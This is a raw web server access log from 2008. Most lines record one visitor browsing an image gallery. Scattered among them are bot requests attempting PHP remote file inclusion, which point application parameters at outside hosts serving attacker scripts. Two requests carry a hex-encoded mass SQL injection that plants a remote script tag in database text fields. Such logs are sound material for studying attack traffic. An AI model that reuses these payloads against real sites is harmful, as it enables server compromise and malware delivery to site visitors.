84.132.162.83 - - [22/Aug/2008:02:32:40 -0500] "GET /rachel%20study/rachel-02.jpg HTTP/1.1" 200 67437 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:32:41 -0500] "GET /rachel%20study/rachel-03.jpg HTTP/1.1" 200 54272 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:32:42 -0500] "GET /rachel%20study/rachel-04a.jpg HTTP/1.1" 200 32768 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:32:42 -0500] "GET /rachel%20study/rachel-10.jpg HTTP/1.1" 200 32768 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:32:42 -0500] "GET /rachel%20study/rachel-09.jpg HTTP/1.1" 200 32768 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:32:48 -0500] "GET /rachel%20study/rachel-01.jpg HTTP/1.1" 206 11637 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:32:48 -0500] "GET /rachel%20study/rachel-02.jpg HTTP/1.1" 206 24243 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:32:48 -0500] "GET /rachel%20study/rachel-03.jpg HTTP/1.1" 206 26037 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:32:48 -0500] "GET /rachel%20study/rachel-04.jpg HTTP/1.1" 206 12660 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:32:48 -0500] "GET /rachel%20study/rachel-07a.jpg HTTP/1.1" 206 21159 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:32:48 -0500] "GET /rachel%20study/rachel-04a.jpg HTTP/1.1" 206 32768 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:32:48 -0500] "GET /rachel%20study/rachel-09.jpg HTTP/1.1" 206 32768 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:32:49 -0500] "GET /rachel%20study/rachel-10.jpg HTTP/1.1" 200 32768 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:32:51 -0500] "GET /rachel%20study/rachel-01.jpg HTTP/1.1" 206 11637 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:32:51 -0500] "GET /rachel%20study/rachel-02.jpg HTTP/1.1" 206 24243 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:32:51 -0500] "GET /rachel%20study/rachel-03.jpg HTTP/1.1" 206 26037 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:32:51 -0500] "GET /rachel%20study/rachel-04.jpg HTTP/1.1" 206 12660 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:32:51 -0500] "GET /rachel%20study/rachel-07a.jpg HTTP/1.1" 206 21159 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:32:52 -0500] "GET /rachel%20study/rachel-10.jpg HTTP/1.1" 200 32768 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:32:53 -0500] "GET /rachel%20study/rachel-04a.jpg HTTP/1.1" 206 32768 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:32:53 -0500] "GET /rachel%20study/rachel-11.jpg HTTP/1.1" 200 32768 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:32:53 -0500] "GET /rachel%20study/rachel-09.jpg HTTP/1.1" 206 32768 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:32:59 -0500] "GET /rachel%20study/rachel-02.jpg HTTP/1.1" 206 13742 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:32:59 -0500] "GET /rachel%20study/rachel-03.jpg HTTP/1.1" 206 19615 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:32:59 -0500] "GET /rachel%20study/rachel-04.jpg HTTP/1.1" 206 6238 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:32:59 -0500] "GET /rachel%20study/rachel-07a.jpg HTTP/1.1" 206 14737 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:33:00 -0500] "GET /rachel%20study/rachel-04a.jpg HTTP/1.1" 206 32768 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:33:00 -0500] "GET /rachel%20study/rachel-09.jpg HTTP/1.1" 206 32768 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:33:00 -0500] "GET /rachel%20study/rachel-10.jpg HTTP/1.1" 206 32768 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:33:00 -0500] "GET /rachel%20study/rachel-11.jpg HTTP/1.1" 200 32768 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
81.9.63.18 - - [22/Aug/2008:02:33:13 -0500] "GET /logs/errors.php?error=http://hanwool.kg.kr/board/data/mc.JPG? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
81.9.63.18 - - [22/Aug/2008:02:33:14 -0500] "GET /errors.php?error=http://hanwool.kg.kr/board/data/mc.JPG? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
218.38.54.160 - - [22/Aug/2008:02:34:11 -0500] "GET /logs/access_log.1214524800/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 404 367 "-""libwww-perl/5.79"
218.38.54.160 - - [22/Aug/2008:02:34:11 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
218.38.54.160 - - [22/Aug/2008:02:34:12 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
151.11.24.250 - - [22/Aug/2008:02:34:30 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
67.19.6.34 - - [22/Aug/2008:02:35:00 -0500] "GET /logs/access_log.1214438400/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.bapeda-jabar.go.id/UserFiles/Image/baru/splash.me.gif? HTTP/1.1" 404 367 "-""libwww-perl/5.79"
195.238.172.13 - - [22/Aug/2008:02:35:22 -0500] "GET /logs/access_log.1214524800/errors.php?error=? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
195.238.172.13 - - [22/Aug/2008:02:35:22 -0500] "GET /errors.php?error=? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
195.238.172.13 - - [22/Aug/2008:02:35:22 -0500] "GET /logs/errors.php?error=? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
74.52.139.226 - - [22/Aug/2008:02:35:48 -0500] "GET /logs/access_log.1208044800/admin/editor2/errors.php?error=http://www.topyn.com/ips.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.810"
81.9.63.18 - - [22/Aug/2008:02:36:01 -0500] "GET /logs/errors.php?error=http://sexywomenonly.com/home/groups/orca/log/plr.xcm??? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
81.9.63.18 - - [22/Aug/2008:02:36:01 -0500] "GET /errors.php?error=http://sexywomenonly.com/home/groups/orca/log/plr.xcm??? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
201.17.129.24 - - [22/Aug/2008:02:36:15 -0500] "GET /logs/errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
201.17.129.24 - - [22/Aug/2008:02:36:16 -0500] "GET /errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
83.211.35.160 - - [22/Aug/2008:02:37:38 -0500] "GET /logs/errors.php?error=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
83.211.35.160 - - [22/Aug/2008:02:37:38 -0500] "GET /errors.php?error=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
81.9.63.18 - - [22/Aug/2008:02:37:43 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://hanwool.kg.kr/board/data/mc.JPG? HTTP/1.1" 404 343 "-""libwww-perl/5.811"
81.9.63.18 - - [22/Aug/2008:02:37:43 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://hanwool.kg.kr/board/data/mc.JPG? HTTP/1.1" 404 338 "-""libwww-perl/5.811"
89.111.176.64 - - [22/Aug/2008:02:38:32 -0500] "GET /logs/admin/editor2/errors.php?error=http://www.topyn.com/ips.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
89.111.176.64 - - [22/Aug/2008:02:38:33 -0500] "GET /admin/editor2/errors.php?error=http://www.topyn.com/ips.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
72.1.16.230 - - [22/Aug/2008:02:38:51 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://triangle-uiuc.org/ascmd.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.65"
72.1.16.230 - - [22/Aug/2008:02:38:51 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://triangle-uiuc.org/ascmd.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.65"
79.170.40.180 - - [22/Aug/2008:02:42:25 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
79.170.40.180 - - [22/Aug/2008:02:42:25 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
69.16.207.46 - - [22/Aug/2008:02:42:40 -0500] "GET /logs/access_log.1208044800/content/multithumb/multithumb?mosConfig_absolute_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 340 "-""libwww-perl/5.811"
202.70.83.4 - - [22/Aug/2008:02:42:45 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tsw.ru/ips.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
202.70.83.4 - - [22/Aug/2008:02:42:45 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tsw.ru/ips.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
79.170.40.180 - - [22/Aug/2008:02:42:53 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
79.170.40.180 - - [22/Aug/2008:02:42:53 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
218.189.215.153 - - [22/Aug/2008:02:43:49 -0500] "GET /logs/access_log.1208044800/modules/center/admin/accounts/process.php?module_path]=http://www.topyn.com/ips.txt? HTTP/1.0" 404 340 "-""libwww-perl/5.805"
218.189.215.153 - - [22/Aug/2008:02:43:50 -0500] "GET /modules/center/admin/accounts/process.php?module_path]=http://www.topyn.com/ips.txt? HTTP/1.0" 404 313 "-""libwww-perl/5.805"
218.189.215.153 - - [22/Aug/2008:02:43:51 -0500] "GET /logs/modules/center/admin/accounts/process.php?module_path]=http://www.topyn.com/ips.txt? HTTP/1.0" 404 318 "-""libwww-perl/5.805"
218.38.54.160 - - [22/Aug/2008:02:43:51 -0500] "GET /logs/access_log.1214438400/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 404 367 "-""libwww-perl/5.79"
67.212.173.42 - - [22/Aug/2008:02:44:35 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.811"
67.212.173.42 - - [22/Aug/2008:02:44:35 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.811"
67.212.173.42 - - [22/Aug/2008:02:44:56 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
67.212.173.42 - - [22/Aug/2008:02:44:56 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kiliclub.com/e-com/cid.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
81.9.63.18 - - [22/Aug/2008:02:44:59 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sexywomenonly.com/home/groups/orca/log/plr.xcm??? HTTP/1.1" 404 343 "-""libwww-perl/5.811"
81.9.63.18 - - [22/Aug/2008:02:44:59 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sexywomenonly.com/home/groups/orca/log/plr.xcm??? HTTP/1.1" 404 338 "-""libwww-perl/5.811"
77.232.68.10 - - [22/Aug/2008:02:46:02 -0500] "GET /logs/access_log.1214524800/errors.php?error=? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
77.232.68.10 - - [22/Aug/2008:02:46:02 -0500] "GET /errors.php?error=? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
77.232.68.10 - - [22/Aug/2008:02:46:03 -0500] "GET /logs/errors.php?error=? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
216.180.241.37 - - [22/Aug/2008:02:47:02 -0500] "GET /logs/admin/editor2/errors.php?error=http://www.topyn.com/ips.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
216.180.241.37 - - [22/Aug/2008:02:47:03 -0500] "GET /admin/editor2/errors.php?error=http://www.topyn.com/ips.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
218.38.54.160 - - [22/Aug/2008:02:47:26 -0500] "GET /logs/access_log.1214179200/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 404 367 "-""libwww-perl/5.79"
80.77.37.118 - - [22/Aug/2008:02:47:32 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://secret-wishes.net/images/t.txt?????????????? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
195.238.172.13 - - [22/Aug/2008:02:48:04 -0500] "GET /logs/access_log.1208736000/errors.php?error=? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
83.46.43.34 - - [22/Aug/2008:02:48:55 -0500] "GET /logs/access_log.1208044800?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 122312 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 1.7; TencentTraveler 4.0)"
83.46.43.34 - - [22/Aug/2008:02:48:59 -0500] "GET /logs/access_log.1208044800?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 122312 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 1.7; TencentTraveler 4.0)"
84.132.162.83 - - [22/Aug/2008:02:49:59 -0500] "GET /rachel%20study/rachel-02.jpg HTTP/1.1" 206 13742 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:49:59 -0500] "GET /rachel%20study/rachel-03.jpg HTTP/1.1" 206 19615 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:49:59 -0500] "GET /rachel%20study/rachel-04.jpg HTTP/1.1" 206 6238 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:50:00 -0500] "GET /rachel%20study/rachel-07a.jpg HTTP/1.1" 206 14737 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:50:01 -0500] "GET /rachel%20study/rachel-04a.jpg HTTP/1.1" 206 32768 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:50:01 -0500] "GET /rachel%20study/rachel-09.jpg HTTP/1.1" 206 32768 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:50:01 -0500] "GET /rachel%20study/rachel-10.jpg HTTP/1.1" 206 32768 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:50:02 -0500] "GET /rachel%20study/rachel-11a.jpg HTTP/1.1" 200 32768 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:50:02 -0500] "GET /rachel%20study/rachel-11.jpg HTTP/1.1" 200 32768 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:50:03 -0500] "GET /rachel%20study/rachel-11.jpg HTTP/1.1" 200 42645 "http://de.images.search.yahoo.com/search/images/view?frame=top&back=http%3A%2F%2Fde.images.search.yahoo.com%2Fsearch%2Fimages%3Fp%3Drachel%2Bpregnant%26ni%3D20%26ei%3DUTF-8%26fr%3Dmoz2%26xargs%3D0%26pstart%3D1%26b%3D521&w=187&h=600&imgurl=tomdolan.pconline.com%2Frachel%2520study%2Frachel-11.jpg&rurl=http%3A%2F%2Ftomdolan.pconline.com%2Frachel%2520study&size=41.6kB&name=rachel-11.jpg&p=rachel+pregnant&type=JPG&no=536&tt=1.285&sigr=11b9h03jl&sigi=11ior31qr&sigb=13fcm24r9""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:50:08 -0500] "GET /rachel%20study/rachel-02.jpg HTTP/1.1" 206 3241 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:50:08 -0500] "GET /rachel%20study/rachel-03.jpg HTTP/1.1" 206 9113 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:50:08 -0500] "GET /rachel%20study/rachel-07a.jpg HTTP/1.1" 206 8315 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:50:08 -0500] "GET /rachel%20study/rachel-12.jpg HTTP/1.1" 200 32768 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:50:09 -0500] "GET /rachel%20study/rachel-04a.jpg HTTP/1.1" 206 32768 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:50:09 -0500] "GET /rachel%20study/rachel-09.jpg HTTP/1.1" 206 32768 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:50:09 -0500] "GET /rachel%20study/rachel-10.jpg HTTP/1.1" 206 32768 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:50:09 -0500] "GET /rachel%20study/rachel-11a.jpg HTTP/1.1" 206 32768 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
84.132.162.83 - - [22/Aug/2008:02:50:09 -0500] "GET /rachel%20study/rachel-11b.jpg HTTP/1.1" 200 32768 "http://tomdolan.pconline.com/rachel%20study/""Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
74.6.8.121 - - [22/Aug/2008:02:50:18 -0500] "GET /logs/access_log.1154995200 HTTP/1.0" 200 191357 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
201.17.129.24 - - [22/Aug/2008:02:52:09 -0500] "GET /logs/access_log.1216598400/!scanhttp://illeganza.altervista.org/id.txt? HTTP/1.1" 404 354 "-""libwww-perl/5.803"
201.17.129.24 - - [22/Aug/2008:02:52:10 -0500] "GET /!scanhttp://illeganza.altervista.org/id.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
201.17.129.24 - - [22/Aug/2008:02:52:12 -0500] "GET /logs/!scanhttp://illeganza.altervista.org/id.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
72.36.235.202 - - [22/Aug/2008:02:52:15 -0500] "GET /errors.php?error=http://www.rcbaleares.com//media/Helvetica?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
